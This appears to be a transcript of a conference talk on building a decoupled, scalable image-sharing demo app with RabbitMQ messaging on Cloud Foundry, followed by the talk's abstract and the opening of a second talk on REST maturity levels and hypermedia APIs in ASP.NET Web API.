Scrum. There is a user there that doesn't really care that the application needs to resize images, that the application needs to tweet about it or whatever. If I'm a user of your app I just want to click upload and see the image ready. I don't really care what your app needs to do in the background so don't make me wait for that.
Then there is us after the whole story we started with a very simple design and now we want to probably quit and do something else. So let's see the evolution of the code. If we have a normal web app let's say with modules, controllers and so on. I will be using pseudo code here. These are comments, that's the function name or method if you want. Those are the arguments and that's the function body and that's the return value. If this sounds familiar to you then you probably know Erlang, that's just Erlang syntax because I think it's very unclutter syntax to show what you want to show. So in the first implementation we were asked to implement an image controller. There was a put method where we get the image and then we called the image handler, did the upload, probably inserting something on the database and moving the file from the temporary file system to the actual final location. Finito. But at some point we had to add the method to resize the picture. Of course this required that we redeploy all this code. Then we were asked to notify the friends, again redeploy all the code, add points to the user, redeploy the code and so on and tweet for a new image. So the question that this code has is like can the code scale to new requirements? What happens if we need to speed up image conversion? In that kind of code we need to probably add more web servers where we just want to scale the resizing, we are scaling for everything even if we don't need it. What happens if we need to send notifications by email? So we need to go and deploy again. What happens if, let's say, Google decides to create his own social network and then we need to send stuff there and not to Twitter? What if we need to resize in different formats? What if we need to swap the language technology without any downtime? So resizing in PHP is too slow, maybe we can do it in Java or C++ or whatever. And yeah, we want to implement all that. Because usually when we speak about scaling we just think about maybe a horizontal scaling or a scaling app, but we don't think that maybe at some point we need to scale down actually. So at night stop having so many consumers resizing images. If you are deployed into a cloud service like EC2 or something, you probably want to pay less money at night or when your website is not so much used. In this dating site we built in China, we knew like when people before going to work they were using the website a lot at lunch and when they left work. So those were the big times where we had to have more workers, for example. So is there a way to do better? Of course. I'm here to sell messaging, so that's what I'm saying. And in messaging if you know this book Enterprise Integration Patterns, this image is from that book and that's just a very simple publish-subscribe pattern. In this case the example the book has is for an address change event that is sent over a channel and then there will be three consumers doing whatever they want to do with that event. That's basically what we could have implemented before. So the first controller we can implement will do the image upload as usual, then it will create a structure with the user data and the image data, I mean metadata not the actual binary of the image that will be very inefficient to move around an image all the time. And then we should publish a message saying new image that will be the tag of the message. 
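Translated out of the Erlang-style pseudocode, the producer side of that second design boils down to something like this in JavaScript; publish() here is just a stand-in for whatever messaging client you end up using, and the handler and field names are invented:

    // Upload controller in the decoupled design. publish() stands in for the
    // messaging client; imageHandler and the event shape are illustrative.
    function putImage(user, image) {
        imageHandler.doUpload(user, image, function (storedImage) {
            var event = {
                user: { id: user.id, name: user.name },
                image: { id: storedImage.id, path: storedImage.path }
            };
            // Fire the event and return right away -- resizing, notifications,
            // points and tweets all happen later in separate consumers.
            publish('new_image', event);
        });
    }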
Then somewhere we can start friends, notifier, consumer or subscriber and this one will listen on the new image event and it will notify the friends. From the message it will get the user data and the image and will do something with that. Then we have a points manager that will add points to the user and a resizer. The point here is that any of these processes can run on their own and we can fire many of them or just one or none of them by using messaging. And actually let's say we only want to give points to users at night when there are no users on the website so we have the load is low so we can run more background workers for example. A messaging system that implements queuing will queue all this messaging while the other end of the network is offline, in this case the points manager and we can put it back online at night and it will process all that queue of messages. So there are many advantages if we decouple the architecture using messaging like that being one of them scaling and so on. Also any of these consumers could be implemented in any language that don't need to be in PHP as was the example or Node.js or whatever. And the second implementation for that there is no second implementation. We just deploy the first part of the code, that's it. We don't really care about new requirements, of course we care but the thing is we can add them on the go. So that was the example I would like to use later in the talk, it's what I implemented actually to demo this concept. But now maybe you don't know what RabbitMQ is. So RabbitMQ is a multi protocol messaging server. This means RabbitMQ at the moment supports three protocols, AMQP which is the standard and the most supported one but also it supports MQTT and STOMP. Depending on the protocol is what you can do with them but there are many different use cases you can do with each of them. This open source under the Mozilla public lessons is polyglot in the sense that you can connect to RabbitMQ from many languages. If there is a client for any of these protocols in your language of choice then you can use or interact with RabbitMQ. And also now since I don't know how many of you follow the Erlang community but RabbitMQ is written in Erlang and recently, not recently but in the last year let's say there is a new programming language for the Erlang virtual machine. Erlang works similar to Java like you have the JVM and then or the CLR in.NET that you have this virtual machine and then all the languages on top like in Java you have Java itself or Clojure or Scala or whatever. In the case of Erlang now there is a new one called Elixir which is very similar to Ruby in syntax and you can also write plugins and stuff for RabbitMQ using Elixir so you can even mix and match languages at that level if you wanted to extend Rabbit for example. Then as I said it is written in Erlang OTP. What do you care or what should I care that is written in Erlang? Because Erlang is a language made specifically for high concurrent applications and has message passing embedded as the main way of coding in Erlang basically so it is very easy to write servers in Erlang. The OTP is the open telecom platform. What does that even mean? I don't know but the thing is the open telecom platform has a set of patterns that you want to have if you create a distributed system. For example in RabbitMQ whenever Rabbit is reading from the network it has an Erlang process to read from that particular TCP connection. 
There may be many of those processes listening on the network and then there is a supervisor, which is an Erlang process that supervises all those small processes. If you send wrong data over the network then that particular process will crash, but you don't want to crash the whole server and you don't want to care about restarting the worker that is reading stuff from the network. The OTP framework will provide you with the supervisor pattern that knows how to restart a worker and how many times to restart a worker. If the worker keeps dying and dying and dying, it can maybe shut down the whole application, maybe shut down this family of workers and so on. The thing is this stuff doesn't need to be implemented by the RabbitMQ developers, so less code, less bugs. When we adopted RabbitMQ at that dating site company back in China, that was one of the things we liked about it. Besides that we had already deployed Erlang and knew it worked pretty well under high load. We knew all the advantages from the language that don't need to be written by the Rabbit guys. Then the multi-protocol part. As I said already, AMQP stands for Advanced Message Queuing Protocol, and in the advanced part it actually has a lot of options. When you think about messaging you probably want to send a message and be confirmed that the message arrived at the other end, or maybe you don't care. Maybe you want the message to be written to the hard drive, or you don't want that because you want faster messaging. As a consumer of messages you may want to tell the server, whenever you send me a message I will acknowledge back that I processed the message, so please don't delete the message from the queue until I confirm that I processed it; or on the other hand you don't care. You can say send me the message, I don't care anymore about this message. All those options are in AMQP. Because of that it can be quite a heavy protocol for a small device, like in the Internet of Things area. IBM created the protocol MQTT for all these small devices with low battery and so on, and RabbitMQ supports MQTT, and it also supports STOMP. STOMP is a text-based protocol, very similar, if you know the Redis protocol or the memcache protocol, it's a very simple text protocol, and it's the one that CERN uses when they talk to Rabbit for example. So they prefer to use STOMP, because also with STOMP you can interact with other brokers, but that's another story. But anyway, if you want to know more, one of my colleagues wrote a blog post on the VMware website. When I said polyglot before, you can use it with PHP, Node.js, Erlang, Java, Ruby, .NET, Haskell and many more like Clojure, and somebody recently blogged how to use it from Cordova, Delphi, whatever. There are all these protocols and each of them has many clients. The ones with the most clients I guess are probably AMQP and STOMP, because STOMP is very, very simple. So also sometimes I get asked by people like, is there anybody actually using this RabbitMQ thing, because I don't know, some people think this is a research toy or something. Anyway, Instagram is using RabbitMQ and they are using it clustered across many data centers inside Amazon, and actually one of the developers from Instagram tweeted some months ago, when there was a data center going down for Amazon, that RabbitMQ and Cassandra were the only two services that survived this whole data center blowing up. So that was pretty cool to know basically.
It's like a show of search website, they are using Rabbit Mailbox app, this application for reading email that got acquired recently, was everywhere on the press. And Mercado Libre, maybe you never heard about Mercado Libre but this is the eighth biggest online retailer. They are the eBay of Latin America, think Latin America 600 million people, Mexico, Brazil, Argentina and Uruguay where I'm from and pretty sure most of the load comes from Uruguay but that's another story. Yeah, they are using Mercado Libre, sorry, Rabbit MQ and if you want to get it, that's the address to get Rabbit MQ. Now the current release is 3.1.1 actually, not 3.0.4. So the next question is how we can start using messaging today. And now it's where I talk about Cloud Foundry. So Cloud Foundry is another product that now is part of Pivotal, before was part of VMware, the same as Rabbit MQ, the same as Redis and many other products. For those of you that don't know, EMC and VMware, they put many of their products together into a new company called Pivotal and Rabbit MQ and Cloud Foundry, Spring Source, Redis and so on all belong to that new company basically. So why Cloud Foundry is good for messaging apart from that I work there basically. So key aspect that Cloud Foundry has. Cloud Foundry supports many applications per account. So Cloud Foundry, I don't like to say that but I have to say it's think about a Heroku that you can deploy on your own data centers for free basically. So Cloud Foundry is on the past level and it's open source so everything that I mentioned in here you can download it, build it and deploy it to your own data center and that's what many companies are actually doing instead of using or dot com offering basically. Anyway when you create an account on Cloud Foundry, this account can have many applications. So what? Right? Then it supports many services per account. You can have many Rabbit MQs, many MongoDB, Redis and so on. So what again? But the good part is that you can share all these services across your apps. So you can have many applications or talking to each other by using Rabbit MQ as a message bus or synchronizing data over MongoDB or Redis for example. And Rabbit MQ is supported by default. So for this example I created an application called Cluster RAM which is just a clone of Instagram basically or clone 1ab I would say. It's a bit going too far to say it's a clone of Instagram. So yeah, kinda. It has real time updates. So the idea of this app is that okay you have your profile there, you upload images, you have friends that follow you, you follow them, some of them, whatever. And whenever you are on the website and you upload a new image then all your friends will see a real time update that you got this new image for some definition of real time of course. Like real time embedded and I don't know how many of these terms don't mean anything today even cloud what does it mean. But anyway, there are many image fields. For example you have the latest images. You can see all what's going on on the website. There is a feed for logged out users so they can actually get to see something. They don't need to register basically. And then the logged in user images. So in your own timeline you will see what you and the people you follow have posted. So let me just show you a bit. This is Cluster RAM. You can upload images. You can use it if you want. Please don't upload anything inappropriate. If you go home, let me see if this works. You can register if you want, create username, password. 
I won't do anything with this username, password. It's just so you can have a profile basically. And then you have the profile. You can see that I have four pictures, no followers, nobody following and so on. That's basically it. So what's behind this Cluster RAM? So it's deployed in Cloud Foundry. It's using RabbitMQ for all the synchronization of data and moving data around. It uses Redis to store all the metadata related to images and users. And MongoDB for the grid file system to share the actual binary of images. And the real-time stuff on Node.js is implemented using Sock.js. So in Cloud Foundry, you can have all these apps or many instances of one app running there. So to share data around, as I said, I'm using Rabbit. Then at some point, I decided to separate the workers from the core app. And they are also running as a separate app. So that's the front end. That's the resizer in Node. And then just to see if this actually works, I rewrote them in Clojure, deploy that. And the resizers are in Clojure. So the cool part is I could just do this swap of technology without actually having to shut down something or anything. Just deploy the Clojure resizer and that's that. So the MongoDB, as I said, is used for the grid effects image storage that I share across all the app instances. Then Redis has many keys there with different functionality or purpose. So for example, with the user, colon, username, so Alvaro or whoever, you will have your profile stored as a hash. Then with your user ID and images, we keep a list of all your images. With all the IDs of the images, not the actual binary. Then there is the image count of that particular user. Then there is the timeline, which has the IDs of all your images plus the IDs of the people you follow. And then there is this latest images list. So all those lists are kept up to date whenever there is a new image, stuff will get pushed there, basically. Then Sox.js is used for, it has two arrays, let's say, to keep state. In the first one, I just have an array, a JavaScript array, where I keep all the connections, the WebSocket connection from all the anonymous users. And the hash is used because each user by its user ID has an entry there whenever you are connected to the Web site. So if I need to broadcast that there is a new image to all the unknown users, then it's just a loop over this array on the top. And if I need to tell a follower that I had a new image, then I will pick that particular follower and send the image there via Sox.js and the same for my own user. So whenever I do the upload, this should appear right away. So to get everything together, I'm using RabbitMQ. So how does actually this, how does RabbitMQ work? For that, I want to give you a small demo. I should have shown this slide, actually. And the demo is on the RabbitMQ simulator. So this is a tool I created also to explain how RabbitMQ works because I think showing static images is bad visualization or it didn't happen, basically. So in RabbitMQ, you want to have a producer of data and a consumer or any messaging app. You want to get your data from here to this point. To do that, you need an address. The address is the exchange. So what you do in RabbitMQ, you usually send messages to the exchange. You send the messages, nothing happens. Why? Because actually, you want to keep the messages in a queue. Soon we will see what the point of having this exchange in between. So if I click send now, I will get three messages there. 
Still nothing happens on the consumer side because I haven't subscribed the consumer to the queue. Once I subscribe it, you can see it start getting the messages. Also at that point, the consumer was offline, let's say, and the messages still got queued because that's the whole point of having a queue. And if I add a new consumer, for example, RabbitMQ will do the round-robin for us. It's not exactly round-robin because if there is a consumer that finished before another one, that consumer will be ready. So actually, RabbitMQ will round-robin across the consumers that are ready, because there is no point of waiting for someone when it's actually processing stuff. I made this clear because we had this exact question like two weeks ago on the mailing list. So that's just how to get the data from one place to the other. And then if you add a new queue here, for example, and click send, you see the messages go to both queues. So what the exchange is doing is basically getting all the queues that are bound to the exchange, those blue circles, and then sending the message to each of them. Inside the server, there is no message copy. Also, that's a very common question and very important question, because you want to know if RabbitMQ is just using your hard drive or memory for duplicating data. But Rabbit will keep only one copy of the message, and the metadata will say it lives in this queue, in that queue, and so on. But think about the exchange as when you have an inbox in email and you have rules. And I don't know, you get a message from your boss, it goes to the trash, or somewhere there. And some other message from NDC Oslo, you will put it on the top and whatnot. So the messages will go directly to the inbox, but they will end up in a separate folder. That's the first abstraction you get from the exchange. Besides that, there are three types of exchange, direct, fan out, and topic. And each of them implements a different routing algorithm. So basically, the exchange, depending on the type, will say, this is how I want to route messages. In this case, we have a direct exchange. So if I come here and set a routing key like Oslo, now I send a message. The message doesn't get there. The default routing key is the empty one. I'm showing here binding key because if I show something empty, we cannot see anything actually, but in fact, there is an empty routing key there. Now if I say Oslo and send, the message only goes there. So basically what the direct exchange is doing, this one, is to check the routing key, basically saying select queues from the queue table where routing key equals binding key, something like that. Not that RabbitMQ actually uses an SQL database underneath, basically, but that's the idea of the direct exchange. If the routing key doesn't match, it won't get the message. Then there is the fan out exchange, which doesn't take into account any routing key. So this is like a direct exchange where the routing key always matches, basically. There is actually no query on the routing key. So it just gives me all the bound queues to this exchange. And finally, we have the topic exchange, which is the most advanced one and the one where you can implement cooler things, I would say. So if I send now with the Oslo routing key, you can see that only this queue here got the messages. So that's just the direct exchange with a fancy name, maybe, I don't know. Not really. When I have a binding, let's say you have, let's say, a logging example.
You have server one, then application one, module one, and info. So let me maybe start again so it's easier to see it in action. So I have a queue here. I will change the binding key to that. And then I have a producer. And I send this. Nothing fancy. What we have here is words separated by dots. That's the whole thing. What happens if instead of sending messages from server one, let's say we are sending all the logs centralized via Rabbit, I start sending messages from my server two. It goes nowhere. Of course, we can create a queue, bind it, come here, put server two. But that's what we saw so far. I mean, there is nothing special. So here is where the patterns start to take place. So we can add a star or asterisk. So I change the queue name, not the binding key. This here, star, change. What did I do wrong? I don't know what happened. So the idea of the topic exchange is that you can have these patterns where you decide, OK, do I want to match by this particular word or not. You can have a star to match that word. Then if you have a hash, for example, it should match everything that's there. I don't know what's going on. Anyway, live demos, they never work. And the hash will match more, sorry, one word or more. So we have these patterns with words separated by dots. If we use the star, we can swap it for one word, or if we have the hash, for one word or more. Sorry for the broken demo. Anyway, so those are the three types of exchange we have. If I don't change the exchange type, it's difficult that this will work. That's the whole thing. There it goes. So it was me doing the wrong demo, basically. So let me show you one more time. Change that. And yeah, that queue will get the message. The other one gets the message. Of course, you can mix and match all that. You don't care about the log level. So if I send here error, then it will go there and so on. And finally, yes, if you want to get every single log, you can set hash here or even like hash error. So you don't care about the modules, the application name or the server. There are all these things you can do with the topic exchange. So for logging, for example, you can have all these queues that you can see. They have an auto-generated name here. Those are options that AMQP will provide you. If you don't really want to think about a new queue name because you just want to listen for the logs coming there, you can do that. And so on, there are way too many options. But you can say all errors, for example, and have this queue like that. Anyway, the whole message is you have producers. You have exchanges which are different routing algorithms. And at the end, you have consumers that will take the messages from the queues. In this particular case, RabbitMQ is very extensible. You can add your own exchange types. But you need to do that in Erlang. Your neighbors from Sweden, they know a lot about Erlang. I don't know, in Norway, because Erlang comes from Sweden. Anyway, enough talking. Any questions so far? No? Yes? Sorry? So the question is, if there is no subscription, what is going to happen to the message? So by subscription, you mean having the consumer or having the queue? So if you don't have a consumer, what happens is the messages start to get queued. Here your limit is the hard drive, basically. It's not memory bound. RabbitMQ has an algorithm that will try to keep as many messages as possible in memory. But at some point, you will raise a memory alarm, and then it will start paging out to disk.
The idea is to try to not touch the hard drive. But at some point, you will. So if there is no subscription, you will get all the messages queued. And you can reject messages from the consumer. You can acknowledge them. There are many things you can do there. So what's the architecture of this Cluster RAM app? For the image upload, we have many users. They can even be served from many app instances. So we can have many Node.js servers running there. They all will send messages to the clusterram upload exchange. So whenever there is a new image upload, there will be a new message there. Then there is a resize queue. This queue will have one, two, three, or whatever amount of resizers you want to run. And the point is, like, cloud messaging. Did you put this on the title just to get us all in this room, or is there any cloud messaging here? In cloud, one important concept is to have elasticity. And competing consumers, that is the name of this messaging pattern, is just that. You can have one box with, let's say, 10 consumers. It will make sense to have probably some relation of your computer cores with the consumer amount. But then you can have more boxes, and all of them can consume from that particular queue. Also, with RabbitMQ, you can do high availability. You can mirror queues and replicate the message content, let's say across many servers, and this state will be known across all these servers. So what happened there? There is a new image event. So the resizer finished doing this resize, and it sent a message: Cluster RAM, new image. So now we have the actual resized image. So one consumer will grab the message, and will add this image to the user data in Redis. So that add image to user queue, we just have consumers getting this data, putting it into Redis. The new image queue will send this image to the latest images feed, so everybody sees what's going on, at least in Redis. And the image to follower queue will grab the message, and will send it to the followers, to the list of images for the follower. Remember that there was a list in Redis that kept all my images plus those of the people I follow. So there we do this other update. Another point to take into account is that producers and consumers can live in the same process. Some people think that, okay, I have one process that is only producing, another is only consuming. That's not necessarily a requirement. Here for example, the resizer one is actually the same resizer that was there in yellow. So we have the same process, getting messages, sending messages. Just to make that clear.
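As a rough sketch of that last point, here is what a worker that is consumer and producer at once might look like; subscribe() and publish() are stand-ins for the actual client calls, and the exchange, queue, and field names are illustrative:

    // Resizer worker: consumes upload events and republishes a new image event.
    // subscribe() and publish() stand in for the real messaging client.
    subscribe('clusterram.upload', 'resize', function (message) {
        resizeImage(message.image, function (resized) {
            // Same process, now acting as a producer.
            publish('clusterram.new_image', {
                user: message.user,
                image: resized
            });
        });
    });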
So I can implement some complex replication algorithm I don't want to know about, or I can put a queue in between with Rabbit and then all this consumer will get it. If they know about this particular user in Sokshere S, I send the message. Else I don't care. So it's like duplicated effort, but it's a very simple way to broadcast this across all the app instances. So you need to decide what pattern you want to implement basically. So for node JAS, I created the most basic and ugly DSL to send the messages. So whenever you want to create a consumer, you define a variable, you specify the exchange name where you want to get the messages. You give a queue name, a routing key in case you need one, and the callback function. So this callback will get a message, the headers of the message, and some delivery information. And there you will put the callback code, like resizing the image, sending, putting something into Redis, whatever. The point here is that whenever you use Rabbit MQ, you will need to create a connection to the broker. You will need to open a channel. Rabbit MQ has an architecture or MQP of having many channels per connection. If you have a language that supports threads, or like Llang, or C Sharp, or Java, whatever, you want to have one channel per thread, for example. In PHP, this doesn't make any sense because there's only one thread. Anyway, you will need to open the connection, open the channel, declare the exchange, declare the queue, and do the binding all the time, probably. So if you don't want to do that, you probably want to implement a library, not like that one because that's probably the most ugly hack there. You maybe want to have a proper object-oriented thing that you pass all these parameters and give you back this thing, but you want to do something like that. Whenever there is a message, you call a callback. That's what you care. You don't care about the exchange. That's only a one-time decision, the same with the queue name and the routing key. What you care is just your callback code. And the cool part here is that if this callback code is much easier to test, for example, and to the couple, because it's only that what you need to call. So you have function that will get messages and produce something. It's very simple at the end of the day, the concept of messaging. And if you do not share this, you already know about all events and callbacks and whatnot. So it's not new. And then this library is called Samper. And it has a method called start consumers. And it will loop over all of them, all these consumers you pass, and will create a queue, and the exchange, do the binding, and so on. So if you want to see the code, it's there, Bitbucket. And my username and the name of the project is in Bitbucket because there is where people put stuff when they don't want anyone to see. If you want to make your code public, you send it to GitHub. Not necessarily because Bitbucket is wrong. Because in case of GitHub, I have many followers. And then people, as soon as I put something, they will probably follow it or whatever. And I don't want that. And yeah, that's why it's there. And if you see my user there, there's also the resizer for Clojure. So you can see both bits of the code. By the way, you asked the first question. What's your name? Sorry? What's your name? Do you want the book? Get it afterwards? I just forgot. Usually, whenever I have a book on hand, I give it to the first guy asking a question. So, oh, girl. Not necessarily a guy. Anyway. 
So maybe you want to see code before I get to the end of the talk. So let me get this here. So the app is a very basic express.js application in Node. It has all the beautiful callbacks and all the stuff people love in Node. And what I'm doing, basically, is, to begin with, setting up the MongoDB connection; if this works, the RabbitMQ connection; if this works, I start the consumers for the user modifiers and I start the resize consumers. And then set up the server. That's all we need to actually care about. So whenever we get a new image, where is this? Yeah. TextMate has the worst combination of keys for hiding the thing on the side. Anyway. So, this is the image upload. This will be the route called whenever there is a new upload, some sanitizing, whatever stuff there. And at some point, I do the storage on MongoDB and get the callback. And if this succeeds, I just create a JSON structure with a username, file name, comment if the user added a comment, and the MIME type. And then Thumper, this mini DSL, will publish a message to the cloudstagram upload exchange with the JSON stuff we sent and no routing key. And make JSON image is just that. Just returns a user ID and so on. It's very simple. So I'm just passing JSON around, basically. So the next question then is to see who is actually bound to this exchange. So if I search, we have this resize consumer, it has a callback, it will get the message, headers and the delivery info, and it will read the image back from MongoDB based on the message file name. It will do the resize. And once it's finished the resizing, it will send a new message called cloudstagram new image. And this thing is there. The add image to user consumer just has a callback that calls a library, add image to user, user ID and so on. And this is just an abstraction over Redis. It just appends something to a list, basically. That's all there is to it. And if this works, then we can finally broadcast that we have a new image. That's it. Then there is also the new image consumer that will add the latest image to the user. Then another consumer will add the image to the followers and so on. If you are paying attention, you can see that I'm actually cheating here because I have all this code in the same Node.js process. You could take them apart and create one consumer for each task and then just start as many of them as you need. That would be the right thing to do. And then at the end, down there, I have this thing starting all the consumers. Then we have this broadcast. Let's see where this is called. So this will interact with the sock.js server, which is in this object called broadcast. And in this case, we'll send to the actual uploader of the image that there is a new image, basically. And to all the anonymous users it will also do a broadcast, and the same for my own followers. And at some point, I start all those consumers. So that's basically what I'm doing there. If you want to see what's inside Thumper, I don't remember. But yeah, basically, I get the RabbitMQ connection. I set up what will be the consumer function for them. Yeah, this is the meat of everything. Whenever we store a callback, we basically get an exchange. Then we get a queue. Then we bind the queue. And then when the queue is actually bound, we subscribe with whatever callback function we passed there. So all these calls, just because we want this function called whenever there is a new message.
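For reference, that boilerplate looks roughly like this with the classic node-amqp client — written from memory, so the option names may be slightly off:

var amqp = require('amqp');

var connection = amqp.createConnection({ url: 'amqp://localhost' });

connection.on('ready', function () {
  // declare the exchange...
  connection.exchange('cloudstagram.upload', { type: 'direct' }, function (exchange) {
    // ...then the queue...
    connection.queue('resize', function (queue) {
      // ...then the binding, and only then the subscription with the callback we actually care about
      queue.bind('cloudstagram.upload', '');
      queue.subscribe(function (message, headers, deliveryInfo) {
        // resize the image, publish the next event, and so on
      });
    });
  });
});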
To avoid all that, I suggest that in every language where you use Rabbit, you want to have your own DSL, basically. And to send a message, we have the exchange name, message, and routing key here. And the same: we get the connection, we get the exchange, and we send the message there. Just to make this clear, you don't need to create the exchange all the time, or the queue, or the binding. You can have one cron job that just runs once and sets up the whole topology, for example. Or you can do it all the time just to make sure that the stuff is there, depending on the paranoia level, basically. And that's that. I mean, then somewhere I have the sock.js code, which is this. It will keep a connection object. And whenever there is a broadcast, it will send it to the anonymous clients or to the user. There is a method to send to the user and another one to send to the anonymous users. It's very basic code. Let me see — somebody magically uploaded an image. And if I log in, let me see. That's the real time part. So that actual image came via sock.js and WebSockets to the browser. And if anybody was actually following me and was on this page, they should also get this image popping up there, which, if you have a lot of followers, will probably be the worst user experience I can imagine. So anyway. So that's CloudStagram. If you have any comments or whatever, you can send them to me on Bitbucket, probably open an issue, or let me know. At some point, I will take care of cleaning the code and putting it on GitHub. But anyway, code. Messaging. With messaging, we can scale, not necessarily scale up or horizontally. We can also scale to new requirements. We can have one piece of code deployed there and then add new stuff without redeploying everything. We can change the technologies, swap the language. And if we don't need to have so many workers, we can also scale down. That's very important if you want to save money. Then you have all this decoupling. Yeah, in my example, I have all the code in the same Node.js project, but you can split it apart. And if you look on Bitbucket, you will see the part that is actually now in Clojure. And you have all this polyglot stuff that you don't need to care about if you implement your own thing. You can talk from different protocols. For example, on the iPhone, the iOS chat from Facebook is using MQTT. It's a very good use case for this tiny protocol. And so on. It really depends where you are, what protocol you want to use, and RabbitMQ can offer all of those. And yeah, in the case of Cloud Foundry, you already have all this stuff there. So if you need to have elasticity, for example, in your cloud thing, you don't really need to think about how you will do all that. I remember back when I was working in Uruguay, we had an in-house made queue on top of MySQL. I mean, you don't want to know how to debug that, and what happened when one consumer crashed, and then did they consume the message, yes or no, and whatever. It's always polling the database every one second, every one minute, or every whatever, but it's always polling. It will not get the data in real time, for some definition of real time, as when RabbitMQ will push that, and so on. And in the case of Cloud Foundry, it will do all the heavy lifting for you. It will maintain MongoDB, Redis, RabbitMQ, whatever service for you. It supports all these multi-applications per account, multiple services. And yeah, if you want, we can say we can do cloud messaging there. So thank you very much. Questions? There are no more books.
Yes? Okay, let me see if I understand: how do you make this exchange redundant? That's the question. So RabbitMQ supports three ways of doing high availability. The most basic one is using Erlang clustering. That is, you can have many RabbitMQ brokers, even on separate machines, where the state is replicated all over. So this exchange will live in all these servers. That's the most basic one. If you care about the messages and the data, then you can use mirrored queues. So when you declare the queue, you can tell Rabbit it's a mirrored queue. And there are many strategies for how many mirrors there are and how to choose the master, what happens if the master goes away, like new master election, all this stuff. But yeah, you can do this kind of replication. Then there is a plugin called Shovel that can also replicate messages across a wide area network, and then there is a federation plugin, which also can do federation of queues and so on. So there are many options depending on what you want to do. For what I know, Instagram is using the mirrored queues across many data centers in Amazon. That's what they do, but it depends on the use case. Any questions? Okay, thanks. And you have the book.
|
In this talk I'd like to present CloudStagram, an Instagram clone prototype that has been built with "real time" features from the get go. New uploaded images are broadcast for background processing using RabbitMQ from the node.js frontend to the Clojure backend. From there real time updates are pushed back to the node.js servers and then to the browser via sock.js. All this implemented in such a fashion that allows horizontal scalability of both the frontend app and the workers app, with the requirement of deploying the app to a public Cloud. In this talk you will learn about the advantages of a message oriented architecture to be able to mash up together a polyglot system of apps and services.
|
10.5446/51535 (DOI)
|
Okay, let's get going. Hi everyone, welcome to this session on CQRS Hypermedia with WebAPI. It's a lot of buzzwords in that one, probably why I got accepted. Okay, what we're going to talk about today: first, a lot about me of course. Then a bit about REST and hypermedia and what that actually means, and a bit about CQRS and how we can combine the two. I'm going to show some demos from a GitHub repository that you can look at if you want. So, my name is Anders, and I'm an architect. REST. What is REST? Can anyone define it for me? No, I didn't think so. REST stands for representational state transfer. It's a term that was coined by a guy called Roy Fielding in his dissertation in 2000. He calls it an architectural style, and actually REST is only chapter 5 of his dissertation. He spends the first three chapters explaining what an architectural style even is. If you want to read it... I have tried. There are other resources out there as well. So what is it actually? REST has been interpreted by a lot of people, many of them much smarter than I am, and it has been discussed over and over. There are actually some pretty good discussions to be found in a Yahoo group called rest-discuss. It can get quite heated, but it's fun to read. One guy who tried to pin it down a bit was Leonard Richardson. He did a talk at QCon in 2008 and came up with a model for judging how RESTful an API is, a maturity scale. It's often a good model to use when you discuss REST. It looks like this: you have four, or actually three, levels. Level 0 at the bottom is where you just use HTTP as a transport protocol and nothing more. And then the ladder goes up to hypermedia, which is where you have to be if you want to call yourself REST. We'll look at the different levels. Level 0 is where you only use HTTP as a transport protocol. This is your SOAP, your WCF HTTP bindings, or when you just pass XML or JSON data over HTTP but nothing else. A typical scenario could look like this: you have an API endpoint or something, you have an action method that says createCustomer, and you pass it some JSON data. And the server will respond with something like 200 OK, success true because you managed to create the customer, and you get back an id. And then you have to know: if I want to get this customer, do I also call getCustomer on the same endpoint? Or maybe I want to search for a customer, so there is a searchCustomer method. So we search for a customer named John, but we don't have any. You still get 200 OK, because the transport of the message was okay, but we haven't found any customer, so success is false. The next level I find a little odd, to be honest, but that's where you introduce resources. You can think of it as introducing proper resources on top of the previous level. So instead of posting to an API endpoint saying createCustomer, you post to /customers. With the same data you get the same result. If you want to get a customer you still post, but maybe you put the id in the URL, and you get the customer back. I don't see many APIs at this level; maybe that's just me misunderstanding it. Level 2, this is where it gets interesting. This is where you start using HTTP for what it is. Above all, you start using the HTTP verbs, like GET, POST, or DELETE.
And you can use media types and content negotiation, and you start using the HTTP error codes. So if you want to create a customer, you might post to /api/customers. You don't get a 200 OK back, because this has actually created a resource, and there's a perfectly good status code for that: 201 Created. And you probably get the id back as well. And to get the customer you don't use a POST request, you use a GET request, and you get the customer back. Maybe you want to be a bit more advanced and try the PATCH verb, which isn't used that often; it basically says I want to update this resource, but only this part of it. And if we try to update this resource, the server can respond that the resource is in use, so there's a 409 Conflict. So you can see that here we're actually using the HTTP verbs and error codes for what they're best at. And I would say most APIs that call themselves REST end up at this level — and most APIs don't even call themselves REST yet. This is actually pretty good. It's intuitive to use, and as long as the resources are well designed it works quite well. There is a problem, though, which in some cases makes it not much better than just using HTTP as transport: you need a lot of documentation to use it. You have to document every resource, every verb, how to construct the messages and what to do with them. And there are few standards for doing that which people actually use. And that's where level 3 comes in, and that is introducing hypermedia. So, hypermedia. If you want to book a trip with Ving.no, do you have to know the exact URL of the resource for the trip to Gran Canaria? No. You go to the front page, you click links, you fill in forms with your information, the passengers and so on. And you can use the same thing for an API. If your API has links, you don't need nearly as much documentation for it. You do have to understand the domain, of course — you have to know what a trip or an order is — but you don't need to read up on everything that can happen, and you don't need to know how URLs are constructed in the system. So there's an abbreviation, HATEOAS — I don't know how you pronounce it — which stands for hypermedia as the engine of application state. And that's the whole point: you use hypermedia, links and forms, to control the flow that the client has to go through. It has nothing to do with SOA, which is what I thought the first time I saw it. So let's see an example of hypermedia then. We post to /customers to create a customer. We get a 201 Created back. But we don't even need the id back, because now we get the location of the customer we just created. That's a link we can follow. We follow that link and get back the whole customer we just created. It looks like before, but we have additional links: we have a link to the address of the customer and to a list of orders for this customer. And that's much more than what we had. So let's look at some code. How do you do this? First, the simple version. How many of you have worked with, or know about, Web API? Awesome. So I won't go through the basics of Web API — I wasn't going to anyway. So in Web API, instead of deriving from Controller as in a normal ASP.NET MVC application, you derive from ApiController instead. And instead of having action methods matched by name, like the last part of the URI, you use the HTTP verbs as method names. So for creating a customer, we have a Post method. We get the customer in; this is going to be model bound.
